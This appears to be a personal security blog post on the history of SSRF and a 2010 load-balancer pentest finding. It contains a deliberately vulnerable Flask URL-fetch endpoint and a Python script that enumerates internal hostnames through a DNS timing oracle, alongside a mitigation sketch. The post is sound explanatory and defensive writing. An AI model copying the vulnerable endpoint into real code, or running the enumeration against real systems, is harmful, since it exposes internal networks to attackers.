A brief history of SSRF
Server-Side Request Forgery is a security issue in applications where an attacker is able to get a server to send some type of request (these days mostly HTTP/S requests) that the server was never intended to send. This is the classic abuse-of-trust vulnerability – the server tends to sit in a “trusted” environment (e.g., a DMZ, your cloud VPC, etc.) while the users of the application sit outside the trust boundary (e.g., mobile devices, cafes, homes, corporate environments, API clients inside and outside the cloud).
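To make that concrete, here is a minimal sketch of the pattern that makes SSRF possible – a server-side handler that fetches whatever URL the client hands it. The endpoint and parameter names are hypothetical and not taken from any real product:

```python
# Hypothetical example of a classic SSRF-prone endpoint.
# The server blindly fetches whatever URL the client supplies, so a
# request for url=http://internal-host/ (or a cloud metadata address)
# is made from *inside* the trust boundary, on the attacker's behalf.
from flask import Flask, request
import requests

app = Flask(__name__)

@app.route("/fetch")
def fetch():
    url = request.args.get("url", "")
    # No validation: the attacker controls the destination, and the
    # request originates from the server's trusted network position.
    resp = requests.get(url, timeout=5)
    return resp.text
```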
A brief history
In this blog post, though, I won’t be talking about all the fancy new things that have had SSRF issues – you can likely find a few hundred of those anyway! Instead, I am going to give a brief history of this issue and what happened before we gave it a “name” – SSRF. The earliest references to the name “SSRF” appear to come from a talk at Black Hat USA 2012, and the Wayback Machine tells me that the CWE-918 page was authored sometime around 2013. If you look closely at the CWE-918 page, though, you will find CVEs dating back to 2002 and 2004. There was a ShmooCon talk about the technique in 2008 too, but the term “SSRF” was not established until 2012.
The Issue
In 2010 I was working on a penetration test for a financial services firm, against a popular load balancer that offered a GTM (Global Traffic Manager) solution. The product let people log in and obtain restricted execution environments through which selected applications could be exposed – useful when you want remote workers, or otherwise untrusted entities, to reach only certain applications. The issue was in a POST request after login, and IIRC even pre-login (though my details on this are fuzzy). This was circa 2010, and to my knowledge the issue was never issued a CVE or associated with a knowledge base article – though I may not know 100%. The guidance from the vendor was simple: update the software and move on.

The issue was this – an authenticated (or unauthenticated) user could send an HTTP POST request to a page with a base64-encoded parameter containing a hostname, which would trigger a DNS lookup on the back end of the GTM. The time it took for the response to come back indicated whether the hostname was legitimate or not. So I took a popular hostname dictionary and, sitting outside on the Internet, enumerated which names resolved and which did not, mapping the hosts on the internal network.
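For illustration, here is a rough sketch of what that enumeration loop might have looked like. The endpoint, parameter name, wordlist file, and timing threshold are all hypothetical stand-ins – the real product and URLs are deliberately not reproduced:

```python
# Rough reconstruction of the timing-based hostname enumeration.
# TARGET, the "host" parameter, hostnames.txt, and THRESHOLD are
# illustrative assumptions, not the actual product's details.
import base64
import time
import requests

TARGET = "https://gtm.example.com/lookup"   # hypothetical endpoint
THRESHOLD = 1.0  # seconds; tune against known-good/known-bad baselines

def probe(hostname: str) -> float:
    """Send the base64-encoded hostname and time the round trip."""
    payload = {"host": base64.b64encode(hostname.encode()).decode()}
    start = time.monotonic()
    requests.post(TARGET, data=payload, timeout=10)
    return time.monotonic() - start

# Names that resolve on the internal DNS tend to come back quickly,
# while non-existent names stall until the resolver gives up (or vice
# versa, depending on the resolver) – that difference is the oracle.
with open("hostnames.txt") as wordlist:
    for name in (line.strip() for line in wordlist):
        elapsed = probe(name)
        status = "resolves" if elapsed < THRESHOLD else "no such host"
        print(f"{name}: {elapsed:.2f}s -> {status}")
```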
The backstory
What the vendor of the GTM software did not know was how critical this application was to the customer’s business. They seemed to be dragging their feet on updates, and meanwhile the customer – a financial institution with a lot at stake – could not go live. Pressure mounted on the IT staff to get the issue fixed, and the vendor, while responsive, was unable to commit to a firm date quickly. Remember, this was 13–14 years ago, before bug bounties, and responsible disclosure was still quite clunky! The customer was also urging me to push the software vendor so we could get everyone talking. Thankfully, on the vendor side there was a solid security person who immediately understood the issue and its impact, and advised the software teams to do the right thing. They moved the functionality behind authentication, and they also added tokens, rate limits, and constant-time responses to fix the issue.
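As a sketch of that last mitigation: one common way to implement a constant-time response is to pad every reply to a fixed floor, so timing no longer leaks whether the lookup succeeded. The function names and floor value below are illustrative assumptions, not the vendor’s actual fix:

```python
# Minimal sketch of the constant-time-response mitigation: whatever
# the backend lookup takes, the handler always answers after a fixed
# floor, and returns an identical body for hits and misses.
import socket
import time

FLOOR_SECONDS = 2.0  # every response takes at least this long

def backend_dns_lookup(hostname: str) -> bool:
    # Stand-in for the GTM's internal resolution step.
    try:
        socket.gethostbyname(hostname)
        return True
    except OSError:
        return False

def handle_lookup(hostname: str) -> str:
    start = time.monotonic()
    backend_dns_lookup(hostname)
    elapsed = time.monotonic() - start
    if elapsed < FLOOR_SECONDS:
        time.sleep(FLOOR_SECONDS - elapsed)
    # Same response either way: neither the content nor the timing
    # reveals whether the name resolved.
    return "ok"
```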
Fast forward
Today, things are obviously a lot better. I wrote this blog post so that the older me can look back and point to it in a meaningful way, without losing the old experiences among the new.